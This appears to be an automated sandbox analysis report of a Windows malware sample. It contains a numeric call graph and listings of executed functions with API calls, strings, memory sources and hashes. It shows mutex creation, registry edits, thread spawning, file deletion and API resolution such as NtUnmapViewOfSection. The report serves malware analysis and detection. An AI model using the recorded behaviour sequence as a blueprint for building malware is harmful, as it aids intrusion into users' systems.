401e8d 47074->47471 47076 40ea36 47077 40ea93 47076->47077 47078 40ea49 47076->47078 47477 401e65 22 API calls 47077->47477 47501 40fbb3 116 API calls 47078->47501 47081 40ea5b 47502 401e65 22 API calls 47081->47502 47082 40eaa3 47478 401e65 22 API calls 47082->47478 47084 40ea67 47503 410f37 36 API calls __EH_prolog 47084->47503 47086 40eac2 47479 40531e 28 API calls 47086->47479 47089 40ead1 47480 406383 28 API calls 47089->47480 47090 40ea79 47504 40fb64 77 API calls 47090->47504 47093 40eadd 47481 401fe2 47093->47481 47094 40ea82 47505 40f3b0 70 API calls 47094->47505 47100 401fd8 11 API calls 47102 40eefb 47100->47102 47101 401fd8 11 API calls 47103 40eafb 47101->47103 47332 4432f6 GetModuleHandleW 47102->47332 47493 401e65 22 API calls 47103->47493 47105 40eb04 47494 401fc0 28 API calls 47105->47494 47107 40eb0f 47495 401e65 22 API calls 47107->47495 47109 40eb28 47496 401e65 22 API calls 47109->47496 47111 40eb43 47112 40ebae 47111->47112 47506 406c1e 28 API calls 47111->47506 47497 401e65 22 API calls 47112->47497 47115 40eb70 47116 401fe2 28 API calls 47115->47116 47117 40eb7c 47116->47117 47118 401fd8 11 API calls 47117->47118 47121 40eb85 47118->47121 47119 40ec02 47498 40d069 47119->47498 47120 40ebbb 47120->47119 47508 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 47120->47508 47507 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 47121->47507 47123 40ec08 47124 40ea8b 47123->47124 47510 41b2c3 34 API calls 47123->47510 47124->47100 47127 40eba4 47127->47112 47129 40f34f 47127->47129 47593 4139a9 30 API calls 47129->47593 47130 40ec23 47133 40ec76 47130->47133 47511 407716 RegOpenKeyExA RegQueryValueExA RegCloseKey 47130->47511 47131 40ebe6 47131->47119 47509 4139a9 30 API calls 47131->47509 47516 401e65 22 API calls 47133->47516 47137 40ec7f 47145 40ec90 47137->47145 47146 40ec8b 47137->47146 47138 40ec3e 47140 40ec42 47138->47140 47141 40ec4c 47138->47141 47139 40f365 47594 412475 65 API calls ___scrt_get_show_window_mode 47139->47594 47512 407738 30 API calls 47140->47512 47514 401e65 22 API calls 47141->47514 47518 401e65 22 API calls 47145->47518 47517 407755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47146->47517 47147 40ec47 47513 407260 97 API calls 47147->47513 47152 40f37f 47596 413a23 RegOpenKeyExW RegDeleteValueW 47152->47596 47153 40ec99 47519 41bc5e 28 API calls 47153->47519 47155 40ec55 47155->47133 47158 40ec71 47155->47158 47157 40eca4 47520 401f13 28 API calls 47157->47520 47515 407260 97 API calls 47158->47515 47159 40f392 47597 401f09 11 API calls 47159->47597 47161 40ecaf 47521 401f09 11 API calls 47161->47521 47165 40f39c 47598 401f09 11 API calls 47165->47598 47166 40ecb8 47522 401e65 22 API calls 47166->47522 47169 40f3a5 47599 40dd42 27 API calls 47169->47599 47170 40ecc1 47523 401e65 22 API calls 47170->47523 47172 40f3aa 47600 414f2a 169 API calls _strftime 47172->47600 47176 40ecdb 47524 401e65 22 API calls 47176->47524 47178 40ecf5 47525 401e65 22 API calls 47178->47525 47180 40ed80 47183 40ed8a 47180->47183 47189 40ef06 ___scrt_get_show_window_mode 47180->47189 47181 40ed0e 47181->47180 47526 401e65 22 API calls 47181->47526 47184 40ed93 47183->47184 47191 40ee0f 47183->47191 47532 401e65 22 API calls 47184->47532 47186 40ed9c 47533 401e65 22 API calls 47186->47533 47187 40ed23 _wcslen 47187->47180 47527 401e65 22 API calls 47187->47527 47543 4136f8 RegOpenKeyExA RegQueryValueExA RegCloseKey 47189->47543 47190 40edae 47534 401e65 22 API calls 47190->47534 47214 40ee0a ___scrt_get_show_window_mode 47191->47214 47193 40ed3e 47528 401e65 22 API calls 47193->47528 47196 40edc0 47535 401e65 22 API calls 47196->47535 47198 40ed53 47529 40da34 32 API calls 47198->47529 47199 40ef51 47544 401e65 22 API calls 47199->47544 47203 40ede9 47536 401e65 22 API calls 47203->47536 47204 40ef76 47545 402093 28 API calls 47204->47545 47205 40ed66 47530 401f13 28 API calls 47205->47530 47208 40ed72 47531 401f09 11 API calls 47208->47531 47210 40ef88 47546 41376f 14 API calls 47210->47546 47212 40edfa 47537 40cdf9 46 API calls _wcslen 47212->47537 47213 40ed7b 47213->47180 47214->47191 47538 413947 31 API calls 47214->47538 47218 40ef9e 47547 401e65 22 API calls 47218->47547 47219 40eea3 ctype 47539 401e65 22 API calls 47219->47539 47221 40efaa 47548 43baac 39 API calls _strftime 47221->47548 47224 40efb7 47226 40efe4 47224->47226 47549 41cd9b 87 API calls ___scrt_get_show_window_mode 47224->47549 47225 40eeba 47225->47199 47540 401e65 22 API calls 47225->47540 47550 402093 28 API calls 47226->47550 47228 40eed7 47541 41bc5e 28 API calls 47228->47541 47232 40efc8 CreateThread 47232->47226 47689 41d45d 10 API calls 47232->47689 47233 40eff9 47551 402093 28 API calls 47233->47551 47234 40eee3 47542 40f474 106 API calls 47234->47542 47237 40f008 47552 41b4ef 79 API calls 47237->47552 47238 40eee8 47238->47199 47240 40eeef 47238->47240 47240->47124 47241 40f00d 47553 401e65 22 API calls 47241->47553 47243 40f019 47554 401e65 22 API calls 47243->47554 47245 40f02b 47555 401e65 22 API calls 47245->47555 47247 40f04b 47556 43baac 39 API calls _strftime 47247->47556 47249 40f058 47557 401e65 22 API calls 47249->47557 47251 40f063 47558 401e65 22 API calls 47251->47558 47253 40f074 47559 401e65 22 API calls 47253->47559 47255 40f089 47560 401e65 22 API calls 47255->47560 47257 40f09a 47258 40f0a1 StrToIntA 47257->47258 47561 409de4 171 API calls _wcslen 47258->47561 47260 40f0b3 47562 401e65 22 API calls 47260->47562 47262 40f101 47571 401e65 22 API calls 47262->47571 47263 40f0bc 47263->47262 47563 4344ea 47263->47563 47268 40f0e4 47269 40f0eb CreateThread 47268->47269 47269->47262 47690 419fb4 112 API calls 2 library calls 47269->47690 47270 40f159 47573 401e65 22 API calls 47270->47573 47271 40f111 47271->47270 47273 4344ea new 22 API calls 47271->47273 47274 40f126 47273->47274 47572 401e65 22 API calls 47274->47572 47276 40f138 47279 40f13f CreateThread 47276->47279 47277 40f1cc 47579 401e65 22 API calls 47277->47579 47278 40f162 47278->47277 47574 401e65 22 API calls 47278->47574 47279->47270 47695 419fb4 112 API calls 2 library calls 47279->47695 47282 40f17e 47575 401e65 22 API calls 47282->47575 47283 40f1d5 47284 40f21a 47283->47284 47580 401e65 22 API calls 47283->47580 47584 41b60d 80 API calls 47284->47584 47288 40f193 47576 40d9e8 32 API calls 47288->47576 47289 40f223 47585 401f13 28 API calls 47289->47585 47290 40f1ea 47581 401e65 22 API calls 47290->47581 47293 40f22e 47586 401f09 11 API calls 47293->47586 47295 40f1a6 47577 401f13 28 API calls 47295->47577 47297 40f1ff 47582 43baac 39 API calls _strftime 47297->47582 47299 40f237 CreateThread 47302 40f264 47299->47302 47303 40f258 CreateThread 47299->47303 47691 40f7a7 120 API calls 47299->47691 47300 40f1b2 47578 401f09 11 API calls 47300->47578 47305 40f279 47302->47305 47306 40f26d CreateThread 47302->47306 47303->47302 47692 4120f7 138 API calls 47303->47692 47310 40f2cc 47305->47310 47587 402093 28 API calls 47305->47587 47306->47305 47693 4126db 38 API calls ___scrt_get_show_window_mode 47306->47693 47308 40f1bb CreateThread 47308->47277 47694 401be9 49 API calls _strftime 47308->47694 47309 40f20c 47583 40c162 7 API calls 47309->47583 47589 4134ff RegOpenKeyExA RegQueryValueExA RegCloseKey 47310->47589 47313 40f29c 47588 4052fd 28 API calls 47313->47588 47316 40f2e4 47316->47169 47590 41bc5e 28 API calls 47316->47590 47321 40f2fd 47591 41361b 31 API calls 47321->47591 47326 40f313 47592 401f09 11 API calls 47326->47592 47328 40f346 DeleteFileW 47329 40f34d 47328->47329 47330 40f31e 47328->47330 47595 41bc5e 28 API calls 47329->47595 47330->47328 47330->47329 47331 40f334 Sleep 47330->47331 47331->47330 47333 434984 47332->47333 47333->47037 47334 44341f 47333->47334 47697 44319c 47334->47697 47337->47019 47338->47023 47339->47030 47340->47026 47341->47039 47342->47025 47343->47045 47344->47047 47349 44fb68 47345->47349 47348 438f5a 8 API calls 3 library calls 47348->47048 47352 44fb85 47349->47352 47353 44fb81 47349->47353 47351 4345bd 47351->47051 47351->47348 47352->47353 47355 449ca6 47352->47355 47367 434fcb 47353->47367 47356 449cb2 ___scrt_is_nonwritable_in_current_image 47355->47356 47374 445888 EnterCriticalSection 47356->47374 47358 449cb9 47375 450183 47358->47375 47360 449cc8 47365 449cd7 47360->47365 47386 449b3a 23 API calls 47360->47386 47363 449cd2 47387 449bf0 GetStdHandle GetFileType 47363->47387 47388 449cf3 LeaveCriticalSection std::_Lockit::~_Lockit 47365->47388 47366 449ce8 ___scrt_is_nonwritable_in_current_image 47366->47352 47368 434fd6 IsProcessorFeaturePresent 47367->47368 47369 434fd4 47367->47369 47371 435018 47368->47371 47369->47351 47410 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47371->47410 47373 4350fb 47373->47351 47374->47358 47376 45018f ___scrt_is_nonwritable_in_current_image 47375->47376 47377 4501b3 47376->47377 47378 45019c 47376->47378 47389 445888 EnterCriticalSection 47377->47389 47397 4405dd 20 API calls _Atexit 47378->47397 47381 4501eb 47398 450212 LeaveCriticalSection std::_Lockit::~_Lockit 47381->47398 47383 4501a1 ___scrt_is_nonwritable_in_current_image _Atexit 47383->47360 47384 4501bf 47384->47381 47390 4500d4 47384->47390 47386->47363 47387->47365 47388->47366 47389->47384 47399 445af3 47390->47399 47392 4500f3 47407 446782 20 API calls _free 47392->47407 47393 4500e6 47393->47392 47406 448a84 11 API calls 2 library calls 47393->47406 47396 450145 47396->47384 47397->47383 47398->47383 47404 445b00 __Getctype 47399->47404 47400 445b40 47409 4405dd 20 API calls _Atexit 47400->47409 47401 445b2b RtlAllocateHeap 47402 445b3e 47401->47402 47401->47404 47402->47393 47404->47400 47404->47401 47408 442f80 7 API calls 2 library calls 47404->47408 47406->47393 47407->47396 47408->47404 47409->47402 47410->47373 47412 434b27 GetStartupInfoW 47411->47412 47412->47056 47414 44f06b 47413->47414 47415 44f062 47413->47415 47414->47060 47418 44ef58 48 API calls 4 library calls 47415->47418 47417->47060 47418->47414 47420 41cb8f LoadLibraryA GetProcAddress 47419->47420 47421 41cb7f GetModuleHandleA GetProcAddress 47419->47421 47422 41cbb8 44 API calls 47420->47422 47423 41cba8 LoadLibraryA GetProcAddress 47420->47423 47421->47420 47422->47064 47423->47422 47601 41b4a8 FindResourceA 47424->47601 47428 40f3ed ctype 47611 4020b7 47428->47611 47431 401fe2 28 API calls 47432 40f413 47431->47432 47433 401fd8 11 API calls 47432->47433 47434 40f41c 47433->47434 47435 43bd51 ___std_exception_copy 21 API calls 47434->47435 47436 40f42d ctype 47435->47436 47617 406dd8 47436->47617 47438 40f460 47438->47066 47440 40210c 47439->47440 47441 4023ce 11 API calls 47440->47441 47442 402126 47441->47442 47443 402569 28 API calls 47442->47443 47444 402134 47443->47444 47444->47069 47671 4020df 47445->47671 47447 41be9e 47448 401fd8 11 API calls 47447->47448 47449 41bed0 47448->47449 47451 401fd8 11 API calls 47449->47451 47450 41bea0 47677 4041a2 28 API calls 47450->47677 47454 41bed8 47451->47454 47455 401fd8 11 API calls 47454->47455 47457 40ea24 47455->47457 47456 41beac 47458 401fe2 28 API calls 47456->47458 47467 40fb17 47457->47467 47460 41beb5 47458->47460 47459 401fe2 28 API calls 47466 41be2e 47459->47466 47461 401fd8 11 API calls 47460->47461 47463 41bebd 47461->47463 47462 401fd8 11 API calls 47462->47466 47678 41ce34 28 API calls 47463->47678 47466->47447 47466->47450 47466->47459 47466->47462 47675 4041a2 28 API calls 47466->47675 47676 41ce34 28 API calls 47466->47676 47468 40fb23 47467->47468 47470 40fb2a 47467->47470 47679 402163 11 API calls 47468->47679 47470->47074 47472 402163 47471->47472 47476 40219f 47472->47476 47680 402730 11 API calls 47472->47680 47474 402184 47681 402712 11 API calls std::_Deallocate 47474->47681 47476->47076 47477->47082 47478->47086 47479->47089 47480->47093 47482 401ff1 47481->47482 47483 402039 47481->47483 47484 4023ce 11 API calls 47482->47484 47490 401fd8 47483->47490 47485 401ffa 47484->47485 47486 40203c 47485->47486 47487 402015 47485->47487 47683 40267a 11 API calls 47486->47683 47682 403098 28 API calls 47487->47682 47491 4023ce 11 API calls 47490->47491 47492 401fe1 47491->47492 47492->47101 47493->47105 47494->47107 47495->47109 47496->47111 47497->47120 47684 401fab 47498->47684 47500 40d073 CreateMutexA GetLastError 47500->47123 47501->47081 47502->47084 47503->47090 47504->47094 47506->47115 47507->47127 47508->47131 47509->47119 47510->47130 47511->47138 47512->47147 47513->47141 47514->47155 47515->47133 47516->47137 47517->47145 47518->47153 47519->47157 47520->47161 47521->47166 47522->47170 47523->47176 47524->47178 47525->47181 47526->47187 47527->47193 47528->47198 47529->47205 47530->47208 47531->47213 47532->47186 47533->47190 47534->47196 47535->47203 47536->47212 47537->47214 47538->47219 47539->47225 47540->47228 47541->47234 47542->47238 47543->47199 47544->47204 47545->47210 47546->47218 47547->47221 47548->47224 47549->47232 47550->47233 47551->47237 47552->47241 47553->47243 47554->47245 47555->47247 47556->47249 47557->47251 47558->47253 47559->47255 47560->47257 47561->47260 47562->47263 47565 4344ef 47563->47565 47564 43bd51 ___std_exception_copy 21 API calls 47564->47565 47565->47564 47566 40f0d1 47565->47566 47685 442f80 7 API calls 2 library calls 47565->47685 47686 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47565->47686 47687 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47565->47687 47570 401e65 22 API calls 47566->47570 47570->47268 47571->47271 47572->47276 47573->47278 47574->47282 47575->47288 47576->47295 47577->47300 47578->47308 47579->47283 47580->47290 47581->47297 47582->47309 47583->47284 47584->47289 47585->47293 47586->47299 47587->47313 47589->47316 47590->47321 47591->47326 47592->47330 47593->47139 47595->47152 47596->47159 47597->47165 47598->47169 47599->47172 47688 41ad17 105 API calls 47600->47688 47602 41b4c5 LoadResource LockResource SizeofResource 47601->47602 47603 40f3de 47601->47603 47602->47603 47604 43bd51 47603->47604 47610 446137 __Getctype 47604->47610 47605 446175 47621 4405dd 20 API calls _Atexit 47605->47621 47607 446160 RtlAllocateHeap 47608 446173 47607->47608 47607->47610 47608->47428 47610->47605 47610->47607 47620 442f80 7 API calls 2 library calls 47610->47620 47612 4020bf 47611->47612 47622 4023ce 47612->47622 47614 4020ca 47626 40250a 47614->47626 47616 4020d9 47616->47431 47618 4020b7 28 API calls 47617->47618 47619 406dec 47618->47619 47619->47438 47620->47610 47621->47608 47623 402428 47622->47623 47624 4023d8 47622->47624 47623->47614 47624->47623 47633 4027a7 11 API calls std::_Deallocate 47624->47633 47627 40251a 47626->47627 47628 402520 47627->47628 47629 402535 47627->47629 47634 402569 47628->47634 47644 4028e8 47629->47644 47632 402533 47632->47616 47633->47623 47655 402888 47634->47655 47636 40257d 47637 402592 47636->47637 47638 4025a7 47636->47638 47660 402a34 22 API calls 47637->47660 47640 4028e8 28 API calls 47638->47640 47643 4025a5 47640->47643 47641 40259b 47661 4029da 22 API calls 47641->47661 47643->47632 47645 4028f1 47644->47645 47646 402953 47645->47646 47647 4028fb 47645->47647 47669 4028a4 22 API calls 47646->47669 47650 402904 47647->47650 47652 402917 47647->47652 47663 402cae 47650->47663 47653 402915 47652->47653 47654 4023ce 11 API calls 47652->47654 47653->47632 47654->47653 47656 402890 47655->47656 47657 402898 47656->47657 47662 402ca3 22 API calls 47656->47662 47657->47636 47660->47641 47661->47643 47664 402cb8 __EH_prolog 47663->47664 47670 402e54 22 API calls 47664->47670 47666 402d24 47667 4023ce 11 API calls 47666->47667 47668 402d92 47667->47668 47668->47653 47670->47666 47672 4020e7 47671->47672 47673 4023ce 11 API calls 47672->47673 47674 4020f2 47673->47674 47674->47466 47675->47466 47676->47466 47677->47456 47678->47447 47679->47470 47680->47474 47681->47476 47682->47483 47683->47483 47685->47565 47696 4127ee 61 API calls 47692->47696 47698 4431a8 _Atexit 47697->47698 47699 4431c0 47698->47699 47701 4432f6 _Atexit GetModuleHandleW 47698->47701 47719 445888 EnterCriticalSection 47699->47719 47702 4431b4 47701->47702 47702->47699 47731 44333a GetModuleHandleExW 47702->47731 47703 443266 47720 4432a6 47703->47720 47706 4431c8 47706->47703 47708 44323d 47706->47708 47739 443f50 20 API calls _Atexit 47706->47739 47709 443255 47708->47709 47740 4441f5 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47708->47740 47741 4441f5 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47709->47741 47710 443283 47723 4432b5 47710->47723 47711 4432af 47742 457729 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47711->47742 47719->47706 47743 4458d0 LeaveCriticalSection 47720->47743 47722 44327f 47722->47710 47722->47711 47744 448cc9 47723->47744 47726 4432e3 47729 44333a _Atexit 8 API calls 47726->47729 47727 4432c3 GetPEB 47727->47726 47728 4432d3 GetCurrentProcess TerminateProcess 47727->47728 47728->47726 47730 4432eb ExitProcess 47729->47730 47732 443364 GetProcAddress 47731->47732 47733 443387 47731->47733 47737 443379 47732->47737 47734 443396 47733->47734 47735 44338d FreeLibrary 47733->47735 47736 434fcb __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 47734->47736 47735->47734 47738 4433a0 47736->47738 47737->47733 47738->47699 47739->47708 47740->47709 47741->47703 47743->47722 47745 448ce4 47744->47745 47746 448cee 47744->47746 47748 434fcb __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 47745->47748 47750 4484ca 47746->47750 47749 4432bf 47748->47749 47749->47726 47749->47727 47751 4484fa 47750->47751 47754 4484f6 47750->47754 47751->47745 47752 44851a 47752->47751 47755 448526 GetProcAddress 47752->47755 47754->47751 47754->47752 47757 448566 47754->47757 47756 448536 __crt_fast_encode_pointer 47755->47756 47756->47751 47758 448587 LoadLibraryExW 47757->47758 47761 44857c 47757->47761 47759 4485a4 GetLastError 47758->47759 47760 4485bc 47758->47760 47759->47760 47762 4485af LoadLibraryExW 47759->47762 47760->47761 47763 4485d3 FreeLibrary 47760->47763 47761->47754 47762->47760 47763->47761 47764 404e26 WaitForSingleObject 47765 404e40 SetEvent FindCloseChangeNotification 47764->47765 47766 404e57 closesocket 47764->47766 47767 404ed8 47765->47767 47768 404e64 47766->47768 47769 404e7a 47768->47769 47777 4050e4 83 API calls 47768->47777 47771 404e8c WaitForSingleObject 47769->47771 47772 404ece SetEvent CloseHandle 47769->47772 47778 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47771->47778 47772->47767 47774 404e9b SetEvent WaitForSingleObject 47779 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47774->47779 47776 404eb3 SetEvent CloseHandle CloseHandle 47776->47772 47777->47769 47778->47774 47779->47776 47780 40165e 47781 401666 47780->47781 47782 401669 47780->47782 47783 4016a8 47782->47783 47786 401696 47782->47786 47784 4344ea new 22 API calls 47783->47784 47785 40169c 47784->47785 47787 4344ea new 22 API calls 47786->47787 47787->47785

                                Executed Functions

                                Function 004432B5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
                                • TerminateProcess.KERNEL32(00000000), ref: 004432DD
                                • ExitProcess.KERNEL32 ref: 004432EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID: PkGNG
                                • API String ID: 1703294689-263838557
                                • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad$HandleModule
                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                • API String ID: 4236061018-3687161714
                                • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404E26 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 65synchronizationCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,00000000,00000000,?,00474EF8,?), ref: 00404E38
                                • SetEvent.KERNEL32(00000000), ref: 00404E43
                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00404E4C
                                • closesocket.WS2_32(FFFFFFFF), ref: 00404E5A
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404E91
                                • SetEvent.KERNEL32(00000000), ref: 00404EA2
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404EA9
                                • SetEvent.KERNEL32(00000000), ref: 00404EBA
                                • CloseHandle.KERNEL32(00000000), ref: 00404EBF
                                • CloseHandle.KERNEL32(00000000), ref: 00404EC4
                                • SetEvent.KERNEL32(00000000), ref: 00404ED1
                                • CloseHandle.KERNEL32(00000000), ref: 00404ED6
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
